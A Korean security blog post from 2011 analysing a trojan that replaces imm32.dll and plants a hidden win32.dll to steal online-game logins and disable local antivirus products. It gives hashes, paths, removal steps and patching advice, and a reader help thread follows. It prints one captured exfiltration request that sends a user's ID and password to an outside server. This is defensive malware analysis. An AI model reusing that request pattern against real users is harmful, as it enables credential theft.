본문 바로가기

벌새::Analysis

악성코드 유포 : 온라인 게임 계정 정보 탈취 목적의 win32.dll (2011.5.16)

반응형
최근 주말을 이용한 악성코드 유포를 통해 온라인 게임 계정 정보를 탈취하는 문제는 Windows 취약점, 웹 브라우저 취약점, Adobe Flash Player 취약점 등을 이용하여 사용자가 변조된 인터넷 사이트에 접속할 경우 자동으로 감염되는 방법이 가장 활발합니다.

또한 네이트온(NateOn) 메신저를 이용하여 특정 URL 링크를 무작위로 전달하여 해당 사이트 접속시 보안 패치가 제대로 이루어지지 않은 사용자 PC가 자동으로 감염되며 이런 과정에서 사용자는 감염 여부를 눈치채기 매우 어렵습니다.

최근에는 Windows 시스템 파일을 변경하는 악성코드 유포가 더욱 다양성을 가지고 있는 것으로 알려져 있으며, 기존부터 꾸준하게 변경되던 imm32.dll 파일의 경우 초기 한글이 제대로 구현되지 않는 문제도 해결한 상태로 보입니다.

지난 주말에는 국내 포털 사이트 파란(Paran) 메인 페이지에 접속할 경우 악성 스크립트가 유포되었다는 소문이 있으며, 해당 유포 방식은 특정 취약점을 이용한 악성 스크립트 삽입을 통해 최종적으로 온라인 게임 계정을 탈취하고 있는 것으로 추정됩니다.

이번 시간에는 당시 유포되어 설치가 이루어진 것으로 추정되는 샘플(MD5 : 199416f5e63b072cbbb581c03611efca)을 이용하여 간단하게 살펴보도록 하겠습니다.

참고로 해당 파일에 대하여 avast! 보안 제품에서는 Win32:Patched-PX (VirusTotal : 24/42) 진단명으로 진단되고 있으므로 참고하시기 바랍니다.

[생성 파일 / 진단 정보]

C:\WINDOWS\system32\imm32.dll (MD5 : 558c8010a3e769f6844dfc4a503c3e21) :: 111,104 Bytes
 - ALYac 2.0 : Trojan.Patched.Starter.B

C:\WINDOWS\system32\imm32.dllVP3Vdx.tmp :: imm32.dll 백업 파일(정상 파일) - 110,080 Bytes
※ 유형 : C:\WINDOWS\system32\imm32.dll(Random 6자리 숫자+영문).tmp

C:\WINDOWS\system32\win32.dll (MD5 : a12cc7782bf7f5329f94f8433629f613)
 - BitDefender : Gen:Trojan.Heur.LP.fu8@aqKflWmi

감염된 PC에서는 imm32.dll 시스템 파일을 변경하여 imm32.dll(Random 6자리 숫자+영문).tmp 파일 유형으로 백업을 하고, win32.dll 파일을 시스템(S), 숨김(H) 속성으로 등록하여 동작하도록 구성되어 있습니다.

대략적인 도식으로 살펴보면 특정 인터넷 사이트에 접속할 경우 취약점이 존재하는 PC는 자동 감염이 이루어지며 이를 통해 imm32.dll / win32.dll 2개의 파일을 생성하여 온라임 게임 계정 탈취와 V3, 알약(ALYac) 보안 제품 기능을 무력화하도록 구성되어 있습니다.

핵심적인 기능을 하는 win32.dll 파일의 경우 Windows 탐색기 기본값으로는 보이지 않으며, 폴더 옵션에서 [보호된 운영 체제 파일 숨기기] 항목을 체크 해제하시고, [숨김 파일 및 폴더 - 숨김 파일, 폴더 및 드라이브 표시]으로 변경을 해야지 파일 존재 여부를 확인할 수 있습니다.

해당 악성코드에 감염된 PC는 아이온(Aion), 다크블러드(DarkBlood.exe), 한게임(HanGame), 넷마블(NetMarble), 리니지(Lineage), 피망(PMang), 메이플스토리(MapleStory) 등 다양한 온라인 게임에 로그인을 하는 과정에서 계정 정보가 외부로 유출이 이루어집니다.

[넷마블 게임 정보 유출 예시]

GET /nm/post.asp?Game=08&para=nate0515&ves=009&d00=NAIMA&d01=NAIMA&d10=(사용자 ID)&d11=(사용자 비밀번호)&d21=&d30=~(생략)~=&d90=1056 HTTP/1.1
User-Agent: IE6.0
Host: nate.natesite.info

예시와 같이 홍콩(HongKong)에 등록된 서버로 게임 아이디(ID), 비밀번호 등의 정보가 유출이 이루어지고 있는 것을 확인할 수 있습니다.

또한 사용자 PC에 설치된 특정 보안 제품의 기능이 무력화되어 실시간 감시, 업데이트, 실행, 검사 등에 영향을 미치는 경우가 발생하므로 만약 자신이 사용하는 보안 제품이 비정상적인 동작을 할 경우에는 악성코드 감염으로 인한 문제일 확률이 높습니다.

win32.dll 파일은 그림과 같이 다양한 프로세스에 자신을 추가하여 삭제를 방해하고 있으며, 보안 제품을 통한 정밀 검사를 통해 치료를 하시기 바랍니다.

만약 수동으로 문제를 해결하셔야 할 경우에는 다음과 같은 방법으로 문제를 해결하시기 바랍니다.
  1. 모든 프로그램을 종료하고, 폴더 옵션에서 시스템 파일, 숨김 폴더(파일)를 볼 수 있도록 변경합니다.
  2. imm32.dll / win32.dll 파일을 찾아 확장자 변경을 합니다. 예를 들어 imm32.dll- / win32.dll- 와 같이 파일을 변경합니다.
  3. 반드시 Windows 재부팅을 합니다.
  4. imm32.dll(Random 6자리 숫자+영문).tmp / imm32.dll- / win32.dll- 3개의 파일을 찾아서 수동으로 삭제를 합니다.

참고로 변경된 imm32.dll 시스템 파일의 확장자를 변경할 경우, 윈도우 파일 보호 기능으로 인하여 자동으로 imm32.dll 파일이 생성됩니다.

이같은 악성코드로부터 PC를 보호하기 위해서는 반드시 매월 정기적으로 제공되는 Microsoft 보안 업데이트와 Adobe Flash Player 보안 패치를 꾸준히 설치해야 합니다.

보안 패치가 정상적으로 이루어진 PC는 악의적인 인터넷 사이트 접속시 보안 제품의 진단 능력과 상관없이 자동으로 감염되는 일은 발생하지 않습니다.

728x90
반응형
  • 요즘 너무 귀찮은것들이 많죠 ㅎㅎ

  • 잘보고있어요 2011.05.19 12:46 댓글주소 수정/삭제 댓글쓰기

    지금 인터넷검색시 자동으로 사이트가 연결되는 넘들때문에 전쟁중이네요^^
    덕분에 님의 글 보고 한개는 지웠는데...아직도 말썽이네요..
    감사합니다~

  • 감사합니다. 2011.06.12 00:01 댓글주소 수정/삭제 댓글쓰기

    악성코드 검사프로그램 울타리로
    서치툴바로 바이러스 걸림 1번째 치료에서 치료안됨

    2번째 치료에서 디스크오류 블루스크린

    다시재부팅함.

    win32전용 바이러스 치료프로그램이라 알려진 2두개의 프로그램
    ,v3 win32전용 프로그램에서는 악성코드 발견안됨.
    하지만 아무것도 실행안해도 cpu가 50%가 넘어서 바이러스다 라고 의심햇거든요.



    작성자님이 알려준방법으로 하고 울타리로 악성코드 검사 하니.
    안나오네요..

    imm32.dll(Random 6자리 숫자+영문).tmp / imm32.dll- / win32.dll-

    세개의 파일중 제일 첫번째는 안나왓어요.
    imm32로 검색햇거든요

    감사합니다.
    와 정말 제 컴의 은이십니다.

    진짜 알약실행해도 업데이트만 하고 사라지고,
    재설치에도 마찬가지 증상이 나와서
    깜짝놀랏다닌깐요.
    후우.. 정말 감사합니다.

    • 이런 악성코드는 알약, V3와 같은 국내 사용자가 많이 사용하는 보안 제품의 동작을 방해합니다.

      그래서 아마 비정상적인 동작을 했을겁니다.

      그리고 이런 악성코드 감염의 원인은 사용자가 윈도우 보안 패치와 Adobe Flash Player 최신 버전을 사용하지 않아서 악성 파일을 뿌리는 인터넷 사이트에 접속할 경우 자동으로 감염됩니다.

      그러므로 보안 패치를 반드시 설치하시기 바랍니다.

  • 데카 2011.06.12 13:08 댓글주소 수정/삭제 댓글쓰기

    벌새님 안녕하세요~~!
    요것때문에 내내 골치가;;; 근데 치료하고서도
    계속 발견되는건 왜 그런건가요
    다 치료하고나서 인터넷 좀 하다보면 (네이버 기사같은)
    갑자기 알약 아이콘이 안보이면서 검색툴로 검색하면 또 나오거든요
    보안패치 Adobe Flash Player 다 최신으로 깔려있거든요
    이게 어디서 감연된지도 참;;;
    알약을 버리고 다른프로그램으로 바꾸면 감염이 안될까요? 답변부탁드려요~~

    • 사용자가 치료를 완료한 상태에서 인터넷 이용 도중에 또다시 감염이 되는 부분은 분명히 보안 패치가 완벽하게 이루어져 있지 않기 때문으로 판단됩니다.

      윈도우 보안 패치의 경우 매월 발표되므로 최신으로 재확인해야 하지 않나 생각됩니다.

      단순히 인터넷 이용 도중에 감염이 된다면 악성 스크립트 문제인데 보안 취약점 외에는 감염이 되려면 사용자가 직접 파일을 실행해야 합니다.

      특히 IE 웹 브라우저는 최신 8버전 이상을 이용하시기 바라며, 보호나라에서 패치 점검 프로그램으로 누락된 패치가 있는지 확인해 보시기 바랍니다.

    • 이 문제를 확인하였습니다.

      제로데이 취약점인지는 아직 모르겠지만, 최신 패치가 완벽해도 감염이 이루어지더군요.

      아마 Windows XP + IE 8 이하 버전에서 발생하는 것 같습니다.

      Windows 7 환경에서는 UAC가 사전 차단을 합니다.

  • 감사합니다. 2011.06.12 16:44 댓글주소 수정/삭제 댓글쓰기

    또 나왓네요.;;
    해당파일(폴더이름)이 울타리라고 하는 악성코드치료프로그램 안의 폴더라서
    알려주신방법으로 하고 지웟습니다.

    일단 현재로서는 나오지는 않습니다만,
    같은치료로 재발한 증상이므로 안심은 힘듭니다.
    알약을 지우고 네이버백신 최신업데이트를 한뒤 표준검사를 햇지만
    바이러스는 발견되지 않앗습니다

    제가 뭐 따로 실행한 부분은 없거든요.
    웹페이지 클릭시 그게 실행으로 작용되어 악성코드및 바이러스가 퍼졋을가요
    익스플로러 7쓰는데, 그부분이 문제인지..

    윈도우자동업데이트는 나올때마다 하거든요 보안부분나오면 모두 다운하고요.

    뭐 다운받지도 않는데, 정말 모르겟습니다.

  • 데카 2011.06.12 20:48 댓글주소 수정/삭제 댓글쓰기

    벌새님 혹시나해서 다시 와봤습니다
    지금 말씀하신대로 Windows XP + IE 8 제가 쓰고있는게 이거거든요
    여기 저기 사이트 들어가보고 있는데
    디시 같은 사이트 들어가면 감염되는 경우도 있고요
    치료하고 재부팅하고 이런식이네요;;;
    그럼 이건 막을 방법이 없는건가요? 다른 백신 프로그램을 사용해야 되는건지...
    자주 감염되고 치료해도 상관없는 악성코드 인가요?
    질문이 많네요ㅡㅡ;;;

    • 해당 악성 파일에 대해서는 세부적인 분석을 완료하고 블로그에 공개하겠습니다.

      Flash 관련 새로운 취약점인지는 보안 업체에서 확인할 부분이지만, Windows XP 환경에서는 매번 자동 감염될 것으로 보입니다.

      현재 안랩에서 정상적인 진단이 되고 있습니다.

      당분간(오늘~내일 오전) 사이트 접속을 함부로 하지 않는 것이 중요해 보입니다.

  • 감사합니다 2011.06.12 22:20 댓글주소 수정/삭제 댓글쓰기

    감염파일win32.dll
    악성코드이름surferbar
    v3에서는 Trojan/Win32.OnlineGameHack로
    검색됩니다.

    치료시 블루스크린 메세지: 디스크-에러

    알려주신방법으로 치료시 잠깐은 보이지 않음 이후 재생성
    발견시 v3 알약등 프로그램 실행되지않음.

    네이버백신으로 실시간검사시 웹에접속할때 2-3초에 한번씩 탐색됨,
    하지만 매번 치료실패됩니다.
    백신 업데이트로 최신버전 입니다.

    • 현재 해당 악성코드는 보안 패치한 PC에서도 자동 감염됩니다.

      사용자가 치료 후에도 악성코드 유포 사이트에 접속하면 재감염이 발생할 수 있으므로 접속을 하지 않는 것만이 해결 방법입니다. 현재로는..

  • 덕분에 2011.06.13 12:41 댓글주소 수정/삭제 댓글쓰기

    몇일전부터 알약도 안되고 인터넷도 자꾸 꺼져서 불안감이 있어서
    오늘 울타리로 검색하니 win32감염되었다고 하더라구요.
    울타리에서 치료가 안되서
    님이 올려주신대로 하니깐 치료 100% 감염된 파일이 없다고 뜨더라구요.

    감사합니다^^. 알약도 이제 생생하게 돌아가내요.

  • 데카 2011.06.13 21:22 댓글주소 수정/삭제 댓글쓰기

    안녕하세요 벌새님 또 왔습니다;;;
    trojan.heur.lp랑 V.TRJ.Patched.imm 2개가 잡혔었거든요
    지금은 디시 같은 사이트접속해도 바이러스는 안잡히는거 같은데
    말씀대로라면 Windows XP + IE 8 이거쓰는한 언제 또 걸릴지 모르겠네요--;;
    벌새님 블로그 방법대로 해보고 안되서(치료하고 감염되고 반복이)
    http://blog.naver.com/jh4l2656/70085229156 이분 블로그 가서
    고쳐본다고 했는데 이게 잘된건지 모르겠어요
    손상안된 imm32.dll 다운받아서 붙이는 방법인데 여기 오시는분들이 도움되실까봐
    혹시 문제 있는거면 댓글 삭제하셔도 괜찮습니다
    그럼 벌새님 컴에 문제가 생기면 또 오겠습니다~~!!

    • 말씀하신 악성 파일에 대해서는 아직 보지 않아서 어떤 식으로 변형되었는지는 모르겠군요.

      제가 설명한 내용과 큰 변화는 없을 것 같은데.. 나중에 확인이 되면 업데이트를 하겠습니다.

      말씀하신 블로그 글은 저번에 한 번 본 것 같습니다.^^

  • 도와주세요ㅜㅜ 2011.06.16 19:48 댓글주소 수정/삭제 댓글쓰기

    사실 귀찮아서 avast실시간 감지를 꺼놨었는데
    며칠전부터 자꾸 인터넷창이 꺼지길래 검사해봤는데 이 악성코드에 걸린것 같아서
    치료도 안되고 안전지대 옮기는것도 안되길래
    위에 가르쳐주신 방법 3번까지 했는데 imm32.dllpivJrx.tmp/imm32.dlltIugix.tmp/imm32.dll-(재부팅하기전에 확장자 바꾼거)/imm32.dll(재부팅하니 생긴거)
    win32.dll.5hNl.tmp/win32.dll.HSMU.tmp/win32.dll.n1ZK.tmp/
    cimwin32.dll/cimwin32.dll-
    이것들 다 삭제해도 되는건가요? 이상해질까봐 선뜻 못 지우겠네요ㅠㅠ

    • 안녕하세요.

      일단 imm32.dllpivJrx.tmp 이런식으로 생성된 파일들은 모두 감염 전의 imm32.dll 정상 파일을 백업한 파일로 추정됩니다.

      그러므로 최초 imm32.dll 파일의 확장자명을 imm32.dll- 이런식으로 교체를 하면 자동으로 윈도우에서는 정상 파일인 imm32.dll 파일이 생성됩니다.

      그 후에 재부팅 후 imm32.dll- 파일과 나머지 imm32.dllpivJrx.tmp 이런 류의 파일을 모두 삭제하시면 됩니다.

      물론 imm32.dllpivJrx.tmp 이런 파일들은 악성파일이 아니므로 삭제까지 할 필요는 없지만 깨끗하게 하시려면 삭제하셔도 됩니다.

      cimwin32.dll 파일은 관련 악성코드를 확인하지 않아서 답변이 어렵습니다.

      개인적으로는 지식이 없다면 안철수연구소의 전용백신으로 검사해서 치료하시기 바랍니다.

      http://www.ahnlab.com/kr/site/download/vacc/vaccView.do?seq=101

      http://www.ahnlab.com/kr/site/download/vacc/vaccView.do?seq=104

      그리고 해당 악성코드 감염 원인은 윈도우 보안 패치, Adobe Flash Player 최신 버전 사용과 관계가 있으므로 모두 업데이트 체크를 해서 최신 버전을 유지하시기 바랍니다.

    • 도와주세요ㅜㅜ 2011.06.16 20:16 댓글주소 수정/삭제

      빠른답변ㅜㅜ정말 감사해요!!
      일단 삭제하라고 하신거는 삭제했구요
      지금 주신 사이트로 백신 검사하고있어요ㅠㅠ
      근데 avast는 계속 사용하는게 좋은가요??
      아니면 안철수연구소 전용백신만 사용해도 될까요??

    • 전용 백신은 실시간으로 악성 파일을 차단하지 못하는 단순한 특정 악성 파일에 대한 치료 기능 외에는 없습니다.

      그러므로 반드시 실시간 감시를 지원하는 보안 제품을 이용하시기 바랍니다.

      개인적으로 avast! 제품은 악성 스크립트 사전 차단 등을 상당히 훌륭하게 막는 좋은 보안 제품입니다.

      이번의 경우에도 사용자가 편의를 위해 실시간 감시를 끄고 사용해서 감염되었을 수도 있습니다.

      그리고 근본적으로 감염이 되지 않으려면 윈도우 보안 패치, Adobe Flash Player 최신 버전 사용이 해답입니다.

      보안 패치만 잘되어 있어도 취약점을 이용한 자동 감염 방식의 경우 보안 제품이 진단 못해도 감염되지 않습니다.

  • 힘들용 2011.06.27 21:17 댓글주소 수정/삭제 댓글쓰기

    어캐하는지 몰라서 백신 검사하는거만하는데.. 제컴퓨터 ..진짜 v3가안켜지고.. 바이러스 걸린게확실한데.. 이해가안되서..~ 제대루 잡는지모르겠네영.. ㅠ

    • 사용자 PC에 설치된 실시간 감시용 보안 제품의 동작을 방해하는 것으로 보입니다.

      이런 경우에는 전용 백신을 이용하시기 바랍니다.

      http://www.ahnlab.com/kr/site/download/vacc/vaccView.do?seq=101

      http://www.ahnlab.com/kr/site/download/vacc/vaccView.do?seq=104

      해당 전용 백신을 실행하여 검사 후 치료를 하시기 바랍니다.

      그 후 실시간 감시용 백신을 실행하여 업데이트 및 정밀 검사를 추가로 진행하세요.

  • 야구광 2011.09.07 18:07 댓글주소 수정/삭제 댓글쓰기

    안녕하세요 답답해서 글을올려봅니다 .. 온라인게임핵 바이러스가 걸린후
    겜을틀어도 5분후에 계속꺼지고 안철수연구소 전용백신 검사해도 바이러스가 없다고뜨니.. 네이버백신은 잡히긴하는데 치료하면 재부팅후치료가능 해놓고 재부팅하면은
    다시 아무변화없고 ..어떻게해야하나요 ㅠㅠ

    • 안녕하세요.

      감염된 상태에서 온라인 게임에 접속하여 게임을 하는 바보같은 행동은 하지 마시기 바랍니다.

      분명 외부에서 해당 계정 정보로 접속하여 금전적 피해를 유발할 것으로 보입니다.

      이들 온라인 게임 악성코드는 주로 V3, 알약을 표적으로 동작을 방해하므로 하우리 바이로봇이나 해외 보안 제품을 이용하여 검사해 보시기 바랍니다.

      진단도 안되는 백신으로 아무것도 할 수 없겠지요.

    • 그리고 핵심적인 부분은 그런 악성코드 감염은 사용자가 윈도우 보안 업데이트, Adobe Flash Player 최신 버전을 사용하지 않아서 감염됩니다.

      이번에는 치료해서 해결될 수 있지만 계속적으로 그런 PC 사용 습관을 가지시면 매주마다 유포되는 악성 파일에 자동으로 감염됩니다.

      사용자가 즐겨가는 웹하드, 언론 사이트 등 국내 유명 사이트는 언제든지 해킹되어 감염될 수 있습니다.

  • 바이러스감염자 ㅠ 2012.01.15 18:54 댓글주소 수정/삭제 댓글쓰기

    잘읽어보았습니다... 근데.. 무슨소리하는지하나도모르겠네요...
    차라리 포맷하는게 더속쉬원할듯